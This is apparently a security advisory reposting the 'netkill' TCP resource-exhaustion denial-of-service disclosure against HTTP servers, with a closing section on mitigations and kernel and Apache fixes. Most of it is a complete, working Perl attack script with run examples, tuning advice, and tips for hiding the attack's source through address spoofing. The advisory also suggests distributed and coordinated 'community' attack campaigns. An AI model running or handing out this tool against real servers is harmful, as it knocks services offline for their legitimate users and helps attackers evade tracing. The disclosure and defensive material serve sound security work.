COMMAND
TCP/IP
SYSTEMS AFFECTED
Any system that runs a TCP service that sends out data
PROBLEM
Stanislav Shalunov posted the following. By exploiting features
inherent to the TCP protocol, remote attackers can perform denial
of service attacks against a wide array of target operating
systems. The attack is most efficient against HTTP servers. A
Perl script is enclosed to demonstrate the problem. The problem
probably isn't "new"; many people have likely thought about it
before, even though Stanislav could not find references on public
newsgroups and mailing lists. It is severe and should be fixed.
When TCPs communicate, each end allocates some resources to each
connection. By repeatedly establishing a TCP connection and then
abandoning it, a malicious host can tie up significant resources
on a server. A Unix server may dedicate some number of mbufs
(kernel data structures used to hold network-traffic-related data)
or even a process to each of those connections, and it takes time
before an abandoned connection times out and its resources are
returned to the system. If there are many such outstanding
abandoned connections, the system may crash, become unusable, or
simply stop serving a particular port. Web servers are
particularly vulnerable to this attack because of the nature of
the protocol (a short request generates an arbitrarily long
response). Remote users can make a service (such as HTTP)
unavailable, and on many operating systems the servers can be
crashed (which interrupts service and also has the potential to
damage filesystems).
This could be made to work against various services; we'll only
discuss how it can be used against HTTP servers. The attack may
or may not render the rest of the services (if any) provided by
the machine unusable.
The mechanism is quite simple. After instructing our kernel not
to answer any packets from the target machine (most easily done
by firewalling that box: with ipfw, "deny ip from TARGET to
any"), we repeatedly initiate a new connection from a random port
by sending a SYN packet, expecting a SYN+ACK response, and then
sending our request. (We could, more traditionally, first ACK the
SYN+ACK and only then send the request, but the way we do it
saves packets.)
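On a FreeBSD attacking box, that firewalling step might look like
the following (the rule number and the 10.0.0.1 target address
are placeholders for illustration):

ipfw add 1000 deny ip from 10.0.0.1 to any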
The attack appears to be more efficient when a static file is
fetched this way rather than dynamic content. The nature of the
file doesn't matter (graphics, text, or plain HTML will do fine),
but its size is of great importance. What happens on the server
when it receives these spurious requests? First of all, the
kernel handles the TCP handshake; then, as we send our second
packet and the handshake is thus completed, a user application is
notified of the request (the accept system call returns, and the
connection is now ESTABLISHED). At that time, the kernel has the
request data in its receive queue. The process reads the request
(which is HTTP/1.0 without any keep-alive options), interprets
it, then writes some data to the file descriptor and closes it
(the connection goes into the FIN_WAIT_1 state). Life then goes
on with some mbufs eaten, if we reach this point.
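That server-side sequence can be pictured with a minimal sketch
(this is not Stanislav's code; the port and response size are
arbitrary choices for illustration):

use strict;
use IO::Socket::INET;

# Minimal one-request-at-a-time HTTP-ish server, to illustrate the
# lifecycle described above.  Port 8080 is an arbitrary placeholder.
my $listen = IO::Socket::INET->new(LocalPort => 8080, Listen => 5,
                                   Reuse => 1) or die "listen: $!\n";
while (my $client = $listen->accept) {  # Connection is now ESTABLISHED.
    my $request = <$client>;            # Read the "GET / HTTP/1.0" line.
    print $client "HTTP/1.0 200 OK\015\012\015\012", 'x' x 65536;
    close $client;                      # Connection goes to FIN_WAIT_1;
}                                       # unacked data stays in mbufs.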
This attack comes in two flavors: mbuf exhaustion and process
saturation.
When doing mbuf exhaustion, one wants the user-level process on
the other end to write the data without blocking and close the
descriptor. The kernel will have to deal with all the data, and
the user-level process will be free, so we can send more requests
this way and eventually consume all the mbufs, or all physical
memory if mbufs are allocated dynamically.
When doing process saturation, one wants the user-level process
to block while trying to write the data. The architecture of many
HTTP servers allows serving only so many connections at a time;
when we reach that number, the server stops responding to
legitimate users. If the server doesn't put a bound on the number
of connections, we're still tying up resources, and eventually
the machine comes to a crawling halt.
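With the script given below, the two flavors map roughly onto the
window options (victim.example.com is a placeholder, and the flag
choices are only illustrative):

./netkill -v victim.example.com      # mbuf exhaustion: the advertised
                                     # window stays open, the server's
                                     # write() completes, and the data
                                     # sits in its kernel send queue
./netkill -v -z victim.example.com   # process saturation: the window
                                     # is closed, so the server process
                                     # blocks trying to write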
Mbuf exhaustion usually has no visible effect (other than
thousands of connections in the FIN_WAIT_1 state) until we reach
a hard limit on the number of mbufs or mbuf clusters. At that
point, the machine panics, dumps a kernel core, reboots, checks
filesystems, and recovers the core dump--all time-consuming
operations. (This is what happens, say, with FreeBSD and other
BSD-derived systems; it worked for Stanislav against a machine
with maxusers=256 and 512MB of RAM.) Some other systems, such as
Linux, seem happy to allocate an arbitrary amount of memory for
mbuf clusters. This memory cannot be paged out. Once we start
approaching the physical memory size, the machine becomes
completely unusable and stays that way.
Process saturation usually exhibits itself in the server being
extremely slow to accept new connections. On the machine itself,
a large number of ESTABLISHED connections and a large number of
processes/threads are visible.
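On the target, the two conditions are easy to tell apart
(illustrative commands; exact state names and flags vary by
system):

netstat -n | grep FIN_WAIT_1 | wc -l    # piling up: mbuf exhaustion
netstat -n | grep ESTABLISHED | wc -l   # piling up: process saturation
ps ax | grep httpd | wc -l              # count of tied-up server children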
Once the process saturation attack succeeds, and for as long as
it lasts, clients trying to connect to the server usually all
time out. If they do manage to establish a connection (this has
only been tested with Apache), the server may not send any data
for a long time.
Due to a lack of consenting targets and time, Stanislav has not
run the attack over modem dial-up links, so this section is
mostly speculation. Let T be the average time the target system
retains a connection of the given kind, R the average time
between two "hits" by one attacking system, N the number of
attacking systems, and A the number of packets the victim sends
before resetting a connection whose peer is unresponsive. Then,
T seconds after the beginning of the attack, the victim will have
about N*T/R hung connections, and that number won't change much
afterwards. A "typical" BSD system with maxusers=64 has 1536 mbuf
clusters. It looks like T is around 500s, so if we can get R=0.3s
(easily done with a good connection), we can crash it from a
single client. For dial-up, a more realistic value of R would be
around 2s (adjusted for redials), so six or so cooperating
dial-up attackers are required to crash the target. (In real life
we might need more attackers; the guess is that ten should be
enough.)
Linux doesn't have a limit on the number of mbuf clusters, and it
keeps connections hanging around longer (T=1400s). In tests,
Stanislav was able to make it accept 48K of data into the send
queue and let the process move on. This means that a single
dial-up attacker can lock about 33MB in non-paged kernel memory.
Four dial-up attackers seem to be able to destroy a 128MB
machine; a single well-connected client can do the same to even
bigger machines.
Process saturation is even easier. Assuming (optimistically for
the victim) T=500s and R=2s, a single dial-up user can tie up 250
instances of the HTTP server. For most configurations, that's the
end of the service.
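As a back-of-the-envelope check, all three estimates are just the
N*T/R formula applied to the numbers above (a sketch; every value
is one of the stated assumptions):

use strict;

# Average number of hung connections: N attackers, connections retained
# for T seconds, one new hit every R seconds per attacker.
sub hung { my ($n, $t, $r) = @_; return $n * $t / $r; }

# BSD, maxusers=64: 1536 mbuf clusters, T=500s, one fast client, R=0.3s.
printf "BSD: %d hung connections (limit 1536)\n", hung(1, 500, 0.3); # ~1666

# Linux: T=1400s, dial-up R=2s, 48K accepted into the send queue each.
printf "Linux: %.1f MB locked\n", hung(1, 1400, 2) * 48 / 1024;      # ~32.8

# Process saturation: T=500s, R=2s, one server process per connection.
printf "Apache: %d children tied up\n", hung(1, 500, 2);             # 250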
TCP is a complicated business; parameters and timing are
everything. Tweaking the window size and the delays makes a lot
of difference. Parallel threads of execution increase efficiency
in some settings; Stanislav did not include code for that, so one
will have to start several copies of netkill, as shown below. For
maximum efficiency, don't mix the two types of attack. Starting
netkill on several machines has a lot of impact. Increasing the
number of BPF devices on a BSD system may be necessary.
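For instance, several copies of the same attack flavor can simply
be started in the background (illustrative only;
victim.example.com is a placeholder):

./netkill -i 0.1 victim.example.com &
./netkill -i 0.1 victim.example.com &
./netkill -i 0.1 victim.example.com &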
Netkill does consume bandwidth, even though it's not a flooding
tool. Ironically, most of the traffic is produced by the victim
systems, and that traffic is directed at the attacking systems.
If the attacking systems have T1 or better connectivity, this is
of little consequence. However, if netkill is used from a modem
dial-up connection, the attacker will need to redial often to get
a new IP address. Cable modems seem unsuitable for launching this
attack: the bandwidth is insufficient, and the IP address cannot
be changed.
One might want to conceal the origin of the attack. Since a TCP
connection is established, we must either be able to see the
SYN+ACK or be able to guess the remote initial sequence number.
It is felt that full-blown IP spoofing with sequence-number
prediction would make this attack inefficient, even if ISNs are
not properly randomized by the remote end. What one might do
instead is send the queries from an unused IP address on the same
network. This has the added benefit that firewalling the target
becomes unnecessary. If the network administrator is not very
skilled, it might take significant time for the true source of
the attack to be discovered. One could further fake the
link-layer source address (if the OS allows it) and make the
source even harder to discover.
We've seen a number of distributed attack tools become publicly
available in the last few months. They mostly just flood the
network with UDP packets and all kinds of garbage. This attack is
different: rather than saturating the link, it saturates
resources on the target machines. If used in combination with a
controlling daemon from a large number of hosts, this attack
would have a very devastating effect on Web-serving
infrastructure, much more devastating than trin00, TFN, or
Stacheldraht. (When used in a distributed setting, Perl with a
non-standard module may not be the executable format of choice.
The Perl script would probably be compiled into a statically
linked native executable using the O module; this also requires
building a .a-format RawIP library.)
An interesting application of netkill would be "community
netkill": a large number of people (say, readers of the same
newsgroup or the same website) could coordinate their resources
and run netkill against a pre-specified target during a
pre-specified time interval. Since each person would send only a
few packets, it would be hard to accuse any of them of doing
anything evil ("I just opened this page, and then my modem
disconnected"), but such an attack could pretty much destroy
anything.
The effect on a load-balanced farm of servers depends on how the
load balancing is organized. Load balancers that simply forward
each connection's packets to a chosen server give the attacker
the opportunity to destroy all the machines behind the balancer,
so they offer no protection; the load balancer itself will most
likely remain unaffected. If the "sticky bit" is set on the load
balancer, an attacker operating from a single IP will only be
able to affect a single system at a time.
Load balancers that establish connections and pump data back and
forth (this includes reverse proxies) protect the servers
themselves; the target of the attack then becomes the load
balancer. It's probably more resilient to the attack than a
regular host, but a distributed attack can certainly take it
down, and then the whole service becomes unavailable at once.
Round-robin DNS load-balancing schemes are not really different
from individual, stand-alone servers.
Redirect-based load balancing is probably the most vulnerable,
because the redirect box is a single point of failure, and it's
not a specialized piece of hardware like a reverse proxy. (The
redirector can itself be a farm of machines load-balanced in
another way; still, this setup is more vulnerable than, say, load
balancing all available servers with a Cisco LocalDirector.)
The program below takes a number of arguments. To prevent script
kiddies from destroying too much of the Web, the author made the
default values not-so-efficient (but efficient enough to
demonstrate that the problem exists). You'll have to understand
how it works to make the best use of it, should you decide to
research the problem further. With the default values, it at
least won't crash a large server over a dial-up connection.
use strict;
use Net::RawIP ':pcap'; # Available from CPAN.
use Socket;
use Getopt::Std;
# Process command line arguments.
my %options;
getopts('zvp:t:r:u:w:i:d:', \%options) or usage();
my $zero_window = $options{z}; # Close window in second packet?
my $verbose = $options{v}; # Print progress indicators?
my $d_port = $options{p} || 80; # Destination port.
my $timeout = $options{t} || 1; # Timeout for pcap.
my $fake_rtt = $options{r} || 0.05; # Max sleep between SYN and data.
my $url = $options{u} || '/'; # URL to request.
my $window = $options{w} || 16384; # Window size.
my $interval = $options{i} || 0.5; # Sleep time between `connections.'
my $numpackets = $options{d} || -1; # Number of tries (-1 == infty).
my $d_name = shift or usage(); # Target host name.
shift and usage(); # Complain if other args present.
# This is what we send to the remote host.
# XXX: Must fit into one packet.
my $data = "GET $url HTTP/1.0\015\012\015\012"; # Two network EOLs in the end.
my ($d_canon, $d_ip) = (gethostbyname($d_name))[0,4] # Resolve $d_name once.
    or die "$d_name: Unknown host\n";
my $d_ip_str = inet_ntoa($d_ip); # Filter wants string representation.
my $dev = rdev($d_name) or die "$d_name: Cannot find outgoing interface\n";
my $s_ip_str = ${ifaddrlist()}{$dev} or die "$dev: Cannot find IP\n";
$| = 1 if $verbose;
print <<EOF if $verbose;
Sending to destination $d_canon [$d_ip_str].
Each dot indicates 10 semi-connections (actually, SYN+ACK packets).
EOF
my $hitcount; # Used for progress indicator if $verbose is set.
while ($numpackets--) {
    # Unfortunately, there's pcapinit, but there's no way to give
    # resources back to the kernel (close the bpf device or whatever).
    # So, we fork a child for each pcapinit allocation and let it exit.
    my $pid = fork();
    sleep 1, next if $pid == -1; # fork() failed; sleep and retry.
    for (1..10) {rand} # Advance the RNG so each child gets fresh values.
    if ($pid) {
        # Parent. Block until the child exits.
        waitpid($pid, 0);
        print '.' if $verbose && !$? && !(++$hitcount % 10);
        select(undef, undef, undef, rand $interval);
    }
    else {
        # Child.
        my $s_port = 1025 + int rand 30000; # Random source port.
        my $my_seq = int rand 2147483648;   # Random sequence number.
        my $packet = new Net::RawIP({tcp => {}});
        my $filter = # pcap filter to catch the SYN+ACK.
            "src $d_ip_str and tcp src port $d_port and tcp dst port $s_port";
        local $^W; # Unfortunately, Net::RawIP is not -w-clean.
        my $pcap;
        # If we don't have enough resources locally, pcapinit will die/croak.
        # We want to catch the error, hence the eval.
        eval q{$pcap = $packet->pcapinit($dev, $filter, 1500, $timeout)};
        $verbose ? die "$@: child died\n" : exit 1 if $@;
        my $offset = linkoffset($pcap); # Link header length (14 or whatever).
        $^W = 1;
        # Send the first packet: SYN.
        $packet->set({ip  => {saddr => $s_ip_str, daddr => $d_ip_str,
                              frag_off => 0, tos => 0, id => int rand 50000},
                      tcp => {source => $s_port, dest => $d_port, syn => 1,
                              window => $window, seq => $my_seq}});
        $packet->send;
        my $temp;
        # Put their SYN+ACK (binary packed string) into $ipacket.
        my $ipacket = &next($pcap, $temp);
        exit 1 unless $ipacket; # Timed out waiting for SYN+ACK.
        my $tcp = new Net::RawIP({tcp => {}});
        # Load $ipacket without the link header into a readable structure.
        $tcp->bset(substr($ipacket, $offset));
        $^W = 0;
        # All we want from their SYN+ACK is their sequence number.
        my ($his_seq) = $tcp->get({tcp => ['seq']});
        # It might increase the interval between retransmits with some
        # TCP implementations if we wait a little bit here.
        select(undef, undef, undef, rand $fake_rtt);
        # Send the ACK for their SYN+ACK and our data all in one packet.
        # The spec allows it, and it works.
        # Who told you about the "three-way handshake"?
        $packet->set({ip  => {saddr => $s_ip_str, daddr => $d_ip_str,
                              frag_off => 0, tos => 0, id => int rand 50000},
                      tcp => {source => $s_port, dest => $d_port, psh => 1,
                              syn => 0, ack => 1,
                              window => $zero_window ? 0 : $window,
                              ack_seq => ++$his_seq,
                              seq => ++$my_seq, data => $data}});
        $packet->send;
        # At this point, if our second packet is not lost, the connection is
        # established. They can try to send us as much data as they want now:
        # we're not listening anymore.
        # If our second packet is lost, they'll have a SYN_RCVD connection.
        # Hopefully, they can handle even a SYN flood.
        exit 0;
    }
}
exit(0);
sub usage
{
    die <<EOF;
Usage: $0 [-vzw#r#d#i#t#p#] <host>
    -v: Be verbose. Recommended for interactive use.
    -z: Close the TCP window at the end of the conversation.
    -p: Port the HTTP daemon is running on (default: 80).
    -t: Timeout for the SYN+ACK to come (default: 1s, must be an integer).
    -r: Max fake rtt, sleep between S+A and data packets (default: 0.05s).
    -u: URL to request (default: `/').
    -w: Window size (default: 16384). Can change the type of attack.
    -i: Max sleep between `connections' (default: 0.5s).
    -d: How many times to try to hit (default: infinity).
See "perldoc netkill" for more information.
EOF
}
SOLUTION
There are several possible workaround strategies. None gives you
a lot of protection, but they can be combined.
* Identify offending sources as they appear and block them at
  your firewall.
* Don't let strangers send TCP packets to your servers. Use a
  hardware reverse proxy. Make sure the proxy can be rebooted
  very fast.
* Have a lot of memory in your machines. Increase the number
  of mbuf clusters to a very large number.
* If you have a router or firewall that can throttle per-IP
  incoming rates of certain packets, then something like "one
  SYN per X seconds per IP" might limit the damage. You could
  set X to 1 by default and raise it to 5 in case of an actual
  attack. Image loading by browsers that don't do HTTP
  keep-alives will be very slow.
* You could fake RSTs. Set up a BSD machine that can sniff all
  the HTTP traffic. Kill (send an RST with the correct sequence
  number) any HTTP connection whose client has not sent
  anything in the last X seconds. You could set X to 60 by
  default and lower it to 5 in case of an actual attack. A
  sketch of this approach follows the list.
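A minimal sketch of that RST-faking watchdog, written against the
same Net::RawIP calls the netkill script uses. The interface
name, server address, idle limit, and the naive per-packet
bookkeeping are all assumptions; a real tool would need proper
connection tracking, in-window sequence numbers, and a timer for
the idle sweep:

use strict;
use Net::RawIP ':pcap';

my $dev       = 'fxp0';      # Interface that sees the HTTP traffic (assumed).
my $server_ip = '10.0.0.1';  # The web server being protected (placeholder).
my $idle      = 60;          # Kill clients silent for this many seconds (X).
my %last;                    # "client_ip:port" => [last-seen time, last seq].

my $probe = new Net::RawIP({tcp => {}});
my $pcap  = $probe->pcapinit($dev, "dst $server_ip and tcp dst port 80",
                             1500, 1);
my $offset = linkoffset($pcap);
while (1) {
    my $temp;
    my $raw = &next($pcap, $temp);  # Same capture call netkill uses.
    next unless $raw;               # Timed out; try again.
    my $pkt = new Net::RawIP({tcp => {}});
    $pkt->bset(substr($raw, $offset));
    my ($saddr) = $pkt->get({ip => ['saddr']});
    my ($sport, $seq) = $pkt->get({tcp => ['source', 'seq']});
    my $cip = join '.', unpack 'C4', pack 'N', $saddr;
    $last{"$cip:$sport"} = [time, $seq];
    for my $c (keys %last) {
        next if time - $last{$c}[0] < $idle;
        my ($ip, $port) = split /:/, $c;
        # Forge an RST that appears to come from the idle client.  Reusing
        # the last seen sequence number is a crude approximation; it really
        # must be the next sequence number the server expects.
        my $rst = new Net::RawIP({tcp => {}});
        $rst->set({ip  => {saddr => $ip, daddr => $server_ip},
                   tcp => {source => $port, dest => 80, rst => 1,
                           seq => $last{$c}[1]}});
        $rst->send;
        delete $last{$c};
    }
}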
A combination of these might save your service. The first method,
while the most labor- and time-consuming, is probably the most
efficient. It has the added benefit of forcing the attackers to
reveal more and more of the machines they control; you can later
go to their administrators and let them know. The last two
methods might do you more harm than good, especially if you
misconfigure something, but the last method is also among the
most efficient.
We're dealing here with features inherent to TCP. It can be
fixed, but the price to pay is making TCP less reliable. However,
when the machine crashes, TCP becomes very unreliable, to say the
least. Let's address mbuf exhaustion first. When the machine is
about to crash, is there anything better it could do? Obviously:
instead of calling panic(), the kernel could randomly free some
25% of the mbuf chains, giving some preference to ESTABLISHED
connections. All applications using sockets associated with these
mbufs would be notified with a failed system call (ENOBUFS).
Sure, that's not very pleasant. But is a crash better?
Systems that do not currently impose a limit on the number of
mbufs (e.g., Linux) should do so and use the above technique when
the limit is reached. An alternative opinion is that the kernel
should stop accepting new connections when there is no more
memory available for TCBs. While this addresses the OS crashes
(which are an undeniable bug), it doesn't address the DoS aspect:
the attacker still denies service to most users while spending
only a small amount of resources (mostly bandwidth).
Process saturation is really an application problem and can only
be solved at the application level. Perhaps Apache should be
taught to put a timeout on network writes. Perhaps the default
limit on the number of children should be raised very
significantly. Perhaps Apache could drop connections that have
not done anything in the last 2*2MSL.
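For instance, directives along these lines in Apache's httpd.conf
move in that direction (illustrative values, not tested
recommendations; raising MaxClients past 256 on Apache 1.3 also
requires rebuilding with a larger HARD_SERVER_LIMIT):

Timeout 30       # Give up sooner on clients that stop reading.
MaxClients 512   # Raise the ceiling on simultaneous children.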